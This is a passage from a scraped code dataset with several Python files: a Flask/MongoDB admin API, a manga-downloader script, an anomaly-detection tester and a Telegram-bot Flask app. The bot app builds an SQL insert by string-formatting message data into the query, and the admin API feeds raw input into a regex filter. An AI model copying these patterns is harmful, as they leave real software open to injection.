\"as\": \"user_item\"\n }\n },\n {\"$addFields\": {\"user_info\": {\"$arrayElemAt\": [\"$user_item\", 0]}}},\n {\"$addFields\": {\"author\": \"$user_info.nick\"}},\n {\n \"$project\": {\n \"_id\": 0, \"uid\": 1, \"title\": 1, \"type\": 1, \"author\": 1, \"browse_num\": 1,\n \"create_time\": {\n \"$dateToString\": {\n \"format\": \"%Y-%m-%d %H:%M\",\n \"date\": {\"$add\": [init_stamp, \"$create_time\"]}\n }\n }\n }\n }\n ]\n cursor = client[\"works\"].aggregate(pipeline)\n data_list = [doc for doc in cursor]\n condition = {\n \"type\" if type != \"default\" else \"null\": \\\n ({\"$in\": [\"tp\", \"tj\"]} if type == \"pic\" else \"yj\") if type != \"default\" else None,\n \"state\": 2, \"is_recommend\": False,\n (\"title\" if category == \"title\" else \"nick\") if content else \"null\": \\\n {\"$regex\": content} if content else None,\n \"$and\": [{\"create_time\": {\"$gte\": int(start_time)}}, {\"create_time\": {\"$lte\": int(end_time)}}]\n }\n count = client[\"works\"].find(condition).count()\n data[\"count\"] = count\n data[\"list\"] = data_list if data_list else []\n return response(data=data)\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n\n\ndef post_add_recomm_works(upload_max=10):\n \"\"\"\n 添加推荐作品\n :param upload_max: 允许同时上传作品的上限值\n \"\"\"\n try:\n # 获取参数\n works_list = request.json.get(\"works_list\")\n if not works_list:\n return response(msg=\"Bad Request: Miss params: 'works_list'.\", code=1, status=400)\n # 最大上传10个\n if len(works_list) > upload_max:\n return response(msg=f\"最多允许选择{upload_max}个作品\", code=1)\n doc = client[\"works\"].update({\"uid\": {\"$in\": works_list}}, {\"$set\": {\"is_recommend\": True}}, multi=True)\n if doc[\"n\"] == 0:\n return response(msg=\"Bad Request: Update failed.\", code=1, status=400)\n return response()\n except Exception as e:\n log.error(e)\n return response(msg=\"Internal Server Error: %s.\" % str(e), code=1, status=500)\n", "repo_name": "coinsccg/microfotos", "sub_path": "controller/admin/operate/admin_operating_api.py", "file_name": "admin_operating_api.py", "file_ext": "py", "file_size_in_byte": 13191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.request.args.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, 
{"api_name": "flask.request.args.get", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 30, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 32, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 34, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 36, "usage_type": "call"}, {"api_name": "initialize.init_stamp", "line_number": 65, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 71, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 77, "usage_type": "name"}, {"api_name": "initialize.log.error", "line_number": 83, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 83, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 84, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 110, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 113, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 117, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 119, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 119, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 129, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 161, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 163, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 164, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 165, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 166, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 167, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 168, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 170, 
"usage_type": "call"}, {"api_name": "initialize.log", "line_number": 170, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 171, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 178, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 180, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 180, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 188, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 188, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 188, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 190, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 192, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 194, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 195, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 197, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 197, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 198, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 205, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 207, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 207, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 219, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 219, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 220, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 220, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 221, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 221, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 221, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 223, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 223, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 224, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 225, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 225, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 225, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 228, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 229, "usage_type": "call"}, 
{"api_name": "datetime.datetime", "line_number": 229, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 230, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 231, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 234, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 236, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 238, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 240, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 242, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 244, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 246, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 248, "usage_type": "call"}, {"api_name": "constant.constant.SEARCH_MAX", "line_number": 249, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 249, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 250, "usage_type": "call"}, {"api_name": "constant.constant.SEARCH_MAX", "line_number": 250, "usage_type": "attribute"}, {"api_name": "constant.constant", "line_number": 250, "usage_type": "name"}, {"api_name": "initialize.init_stamp", "line_number": 281, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 287, "usage_type": "name"}, {"api_name": "initialize.client", "line_number": 297, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 300, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 302, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 302, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 313, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 315, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 318, "usage_type": "call"}, {"api_name": "initialize.client", "line_number": 319, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 321, "usage_type": "call"}, {"api_name": "middleware.auth.response", "line_number": 322, "usage_type": "call"}, {"api_name": "initialize.log.error", "line_number": 324, "usage_type": "call"}, {"api_name": "initialize.log", "line_number": 324, "usage_type": "name"}, {"api_name": "middleware.auth.response", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "35043696826", "text": "import requests\nfrom PIL import Image\nimport os\nimport re\nfrom colors import bcolors\nfrom colorama import init\nfrom termcolor import cprint\nimport math\ninit()\n\nImage.MAX_IMAGE_PIXELS = 933120000\n\ncprint(f\"{bcolors.OKBLUE}Digite o id do manga: {bcolors.END}\")\nid_manga = input()\n\nchapters = requests.get(f'https://tsukimangas.net/api/v2/chapters/{id_manga}/all').json()\n\nfor ch in chapters:\n print(ch['number'])\ncprint(f'Selecione os caps \\n{bcolors.BOLD}EXEMPLO: 1,2,3...{bcolors.END} \\nou \\n{bcolors.BOLD}EXEMPLO: 1-10{bcolors.END}')\nchs_selects = input()\ncprint(f'{bcolors.OKBLUE}Qual é o volume? 
(if there is none, just press enter):{bcolors.END} ')\r\nvol = str(input() or '')\r\nif(vol != ''):\r\n vol = f' (v{vol})'\r\nchs = chs_selects.split(',')\r\nif len(chs) == 1:\r\n chs = chs_selects.split('-')\r\n if len(chs) > 1:\r\n nmin = chs[0]\r\n nmax = chs[1]\r\n chs = []\r\n for ch in chapters:\r\n if float(ch['number']) >= float(nmin) and float(ch['number']) <= float(nmax):\r\n chs.append(ch['number'])\r\n\r\nfor ch in chs:\r\n for c in chapters:\r\n if(float(ch) == float(c['number'])):\r\n n = 1\r\n for version in c['versions']:\r\n for scan in version['scans']:\r\n if len(c['versions']) > 1:\r\n print(f\"{n} - {scan['scan']['name']}\")\r\n n += 1\r\n\r\n version = 1\r\n if len(c['versions']) > 1:\r\n cprint(f'{bcolors.OKBLUE}Select the version: {bcolors.END}')\r\n version = int(input())\r\n\r\n version_id = c['versions'][version-1]['id']\r\n\r\n pages = requests.get(f'https://tsukimangas.net/api/v2/chapter/versions/{version_id}').json()\r\n\r\n manga_name = (pages['chapter']['manga']['title'][:20]) if len(pages['chapter']['manga']['title']) > 20 else pages['chapter']['manga']['title']\r\n manga_name = re.sub('[^a-zA-Z0-9&_áàâãéèêíïóôõöúçñÁÀÂÃÉÈÊÍÏÓÔÕÖÚÇÑ-]','', manga_name)\r\n ch_title = ''\r\n if(pages['chapter']['title']): \r\n ch_title = \" ({0})\".format(re.sub('[^a-zA-Z0-9&_áàâãéèêíïóôõöúçñÁÀÂÃÉÈÊÍÏÓÔÕÖÚÇÑ\\s\\.-]','', pages['chapter']['title']))\r\n pages = pages['pages']\r\n ch = c['number']\r\n g = []\r\n if(len(c['versions'][version-1]['scans']) > 0):\r\n for scan in c['versions'][version-1]['scans']:\r\n g.append(re.sub(' ', '', scan['scan']['name']))\r\n g.append('+')\r\n g.pop()\r\n groups = \"\".join(g)\r\n\r\n if(bool(re.search(\"^0{1}\\d\", ch))):\r\n ch = re.sub('^0','',ch)\r\n\r\n cprint(f'{bcolors.WARNING}downloading chapter {ch}{bcolors.END}')\r\n if not os.path.isdir(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]')):\r\n os.makedirs(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]'))\r\n\r\n page_number = 1\r\n for page in pages:\r\n r = requests.get(f\"https://tsukimangas.net/img{page['url']}\", stream=True)\r\n if r.status_code == 200:\r\n r.raw.decode_content = True\r\n img = Image.open(r.raw)\r\n icc = img.info.get('icc_profile')\r\n if img.mode in (\"RGBA\", \"P\"): img = img.convert(\"RGB\")\r\n width, height = img.size\r\n if(height > 10000):\r\n top = 0\r\n left = 0\r\n slices = int(math.ceil(height/5000))\r\n count = 1\r\n for slice in range(slices):\r\n if count == slices:\r\n bottom = height\r\n else:\r\n bottom = int(count * 5000) \r\n\r\n box = (left, top, width, bottom)\r\n img_slice = img.crop(box)\r\n top += 5000\r\n img_slice.save(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]', f\"%03d.jpg\" % page_number), quality=80, dpi=(72, 72), icc_profile=icc)\r\n cprint(f'{bcolors.OK}page {page_number} downloaded successfully{bcolors.END}')\r\n count += 1\r\n page_number += 1\r\n else:\r\n img.save(os.path.join('MangaDownloads', manga_name, f'{manga_name} [pt-br] - c{ch}{vol}{ch_title} [{groups}]', f\"%03d.jpg\" % page_number), quality=80, dpi=(72, 72), icc_profile=icc)\r\n cprint(f'{bcolors.OK}page {page_number} downloaded successfully{bcolors.END}')\r\n page_number += 1\r\n else:\r\n cprint(f'{bcolors.FAIL}failed to download page {page_number} of chapter {c[\"number\"]}{bcolors.END}')\r\n page_number += 1\r\n", "repo_name": "Lyem/tsuki_downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "colorama.init", 
"line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.MAX_IMAGE_PIXELS", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 11, "usage_type": "name"}, {"api_name": "termcolor.cprint", "line_number": 13, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 13, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 13, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "termcolor.cprint", "line_number": 20, "usage_type": "call"}, {"api_name": "colors.bcolors.BOLD", "line_number": 20, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 20, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 20, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 22, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 22, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 22, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 22, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 49, "usage_type": "call"}, {"api_name": "colors.bcolors.OKBLUE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 49, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 54, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 66, "usage_type": "call"}, {"api_name": "re.search", "line_number": 71, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 72, "usage_type": "call"}, {"api_name": "termcolor.cprint", "line_number": 74, "usage_type": "call"}, {"api_name": "colors.bcolors.WARNING", "line_number": 74, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 74, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 102, "usage_type": "call"}, {"api_name": "colors.bcolors.OK", "line_number": 102, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 102, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 107, "usage_type": "call"}, 
{"api_name": "colors.bcolors.OK", "line_number": 107, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 107, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 107, "usage_type": "attribute"}, {"api_name": "termcolor.cprint", "line_number": 110, "usage_type": "call"}, {"api_name": "colors.bcolors.FAIL", "line_number": 110, "usage_type": "attribute"}, {"api_name": "colors.bcolors", "line_number": 110, "usage_type": "name"}, {"api_name": "colors.bcolors.END", "line_number": 110, "usage_type": "attribute"}]} +{"seq_id": "27922806781", "text": "from model_utils import *\nfrom utils import *\nfrom data import *\nfrom sklearn.metrics import roc_auc_score\n\nfrom c2d_models import *\n\nclass Tester:\n def __init__(\n self,\n model,\n test_data\n ):\n if not isinstance(model, str):\n self.model = model\n else:\n self.model = load_model(model)\n self.test_data = test_data\n \n def test(self, batch_size = 64, return_results = True):\n results = dict()\n normal_images = self.test_data.normal_data\n for anomaly_type, anomaly_images in self.test_data.abnormal_data.items():\n labels = np.array([self.test_data.NORMAL_LABEL] * len(normal_images) + [self.test_data.ABNORMAL_LABEL] * len(anomaly_images))\n images = np.concatenate((normal_images, anomaly_images))\n reconstructions = self.model.predict(images)\n losses = np.sum((reconstructions - images)**2, axis = (1,2,3))\n normalized = (losses - losses.min()) / (losses.max() - losses.min())\n anomaly_roc_auc_score = roc_auc_score(labels, normalized)\n results[anomaly_type] = {\n \"targets\": labels,\n \"losses\": losses,\n \"normalized\": normalized,\n \"roc_auc_score\": anomaly_roc_auc_score,\n }\n results[\"mean_roc_auc_score\"] = np.mean([results[at][\"roc_auc_score\"] for at in results.keys()])\n \n for key in results.keys():\n try: print(key, results[key][\"roc_auc_score\"])\n except: print(key, results[key])\n \n if return_results: return results\n else: return True", "repo_name": "ambareeshravi/AD_AE_XAI", "sub_path": "tester.py", "file_name": "tester.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.metrics.roc_auc_score", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "33011046815", "text": "import tele_util, config, cmds, crab, stats\nfrom flask import Flask, request, render_template\nimport time\nimport os\n\n\nos.environ[\"TZ\"] = \"Europe/Berlin\"\ntime.tzset()\napp = Flask(__name__)\n\n\nswagbot = tele_util.startBot(config.swagbot)\nCMD_MAPPING = {\n 'zitat': cmds.zitat,\n 'gif': cmds.gif,\n 'tenor': cmds.tenor,\n 'list': cmds.list_,\n 'roulette': cmds.roulette,\n 'bit': cmds.bit,\n 'svb': cmds.sendViaBot,\n 'daily': cmds.dailyPost,\n 'roll': cmds.rollFunc,\n 'prop': cmds.props,\n 'quiz': cmds.quiz,\n 'trivia': cmds.trivia,\n 'truth': cmds.truth,\n 'dare2': cmds.dare,\n 'stats': cmds.stats,\n}\n\n@app.route(config.swagbot['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef swagbot_hook():\n msg = tele_util.MsgUtil(swagbot, request.get_json())\n if msg and not msg.hasmsg:\n return 'OK'\n if msg.cmd in CMD_MAPPING:\n CMD_MAPPING[msg.cmd](msg)\n if 'Y' == tele_util.getProp(msg.getChatId(), 'addFile', default='N'):\n tele_util.addFile(msg)\n if 'Y' != tele_util.getProp(msg.getChatId(), 'MsgLog/deaktivate', default='N'):\n tele_util.updateMsgLog(msg.upd)\n return 'OK'\n\ndnbot = 
tele_util.startBot(config.dntelegram)\n\n@app.route(config.dntelegram['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef dnbot_hook():\n m = request.get_json()\n if m.get('message', {}).get('photo', None):\n sql = \"\"\"\n insert into photo\n select '%(f)s' from DUAL where not exists (\n select file_id from photo where file_id = '%(f)s'\n ) limit 1\"\"\" % {'f': m['message']['photo'][0]['file_id']}\n tele_util.executeSQL(sql)\n return \"OK\"\n\ntriviabot = tele_util.startBot(config.triviabot)\n@app.route(config.triviabot['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef triviabot_hook():\n msg = tele_util.MsgUtil(triviabot, request.get_json())\n if msg.cmd == 'trivia':\n cmds.trivia(msg, config=config.triviabot)\n return \"OK\"\n\n\ncrabbot = tele_util.startBot(config.crabtelegram)\n\n@app.route(config.crabtelegram['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef crabbot_hook():\n msg = tele_util.MsgUtil(crabbot, request.get_json())\n if msg.cmd == 'silence':\n crab.createOutPng(msg.txt)\n msg.send('', typ='p', file='/home/fia4awagner/mysite/img/out.png')\n return \"OK\"\n\n@app.route('/groupstats/<groupid>')\ndef groupstats(groupid):\n data = stats.getData(groupid, request)\n users = stats.getUser(data)\n\n out = {\n 'groupid': data['chat_id'],\n 'groupname': 'idb with friends',\n 'scalestart': data['start'],\n 'scaleend': data['end'],\n 'btnday': True,\n 'linelabels': ['%02d:00' % i for i in range(0,24)],\n 'linedata': stats.getLinedata(data, users),\n 'users': users,\n 'chart1': stats.getChart1(data),\n 'chart2': stats.getChart2(data),\n 'chart3': stats.getChart3(data),\n }\n return render_template('group_stats.html', **out)\n\n@app.route('/sensordata/put', methods=['POST'])\n@tele_util.tryAndLogError\ndef put_sensor_data():\n json = request.get_json()\n data = {'sensor': json['sensor'],\n 'time': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'temp': int(json['temp']),\n 'humidity': int(json['humidity']),}\n sql = 'insert into sensor_data value (%(sensor)s, %(time)s, %(temp)s, %(humidity)s);'\n tele_util.executeSQL(sql, data)\n return \"OK\"\n\n\n\n\n", "repo_name": "swa9bot/paw", "sub_path": "flask_app.py", "file_name": "flask_app.py", "file_ext": "py", "file_size_in_byte": 3424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "time.tzset", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "tele_util.startBot", "line_number": 12, "usage_type": "call"}, {"api_name": "config.swagbot", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cmds.zitat", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cmds.gif", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cmds.tenor", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cmds.list_", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cmds.roulette", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cmds.bit", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cmds.sendViaBot", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cmds.dailyPost", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cmds.rollFunc", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cmds.props", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cmds.quiz", "line_number": 24, "usage_type": "attribute"}, 
{"api_name": "cmds.trivia", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cmds.truth", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cmds.dare", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cmds.stats", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "tele_util.getProp", "line_number": 39, "usage_type": "call"}, {"api_name": "tele_util.addFile", "line_number": 40, "usage_type": "call"}, {"api_name": "tele_util.getProp", "line_number": 41, "usage_type": "call"}, {"api_name": "tele_util.updateMsgLog", "line_number": 42, "usage_type": "call"}, {"api_name": "config.swagbot", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 45, "usage_type": "call"}, {"api_name": "config.dntelegram", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request.get_json", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "tele_util.executeSQL", "line_number": 57, "usage_type": "call"}, {"api_name": "config.dntelegram", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 60, "usage_type": "call"}, {"api_name": "config.triviabot", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "cmds.trivia", "line_number": 66, "usage_type": "call"}, {"api_name": "config.triviabot", "line_number": 66, "usage_type": "attribute"}, {"api_name": "config.triviabot", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 70, "usage_type": "call"}, {"api_name": "config.crabtelegram", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "crab.createOutPng", "line_number": 77, "usage_type": "call"}, {"api_name": "config.crabtelegram", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stats.getData", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "argument"}, {"api_name": "stats.getUser", "line_number": 84, "usage_type": "call"}, {"api_name": "stats.getLinedata", "line_number": 93, "usage_type": "call"}, {"api_name": "stats.getChart1", "line_number": 95, "usage_type": "call"}, {"api_name": "stats.getChart2", "line_number": 96, "usage_type": "call"}, {"api_name": "stats.getChart3", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 
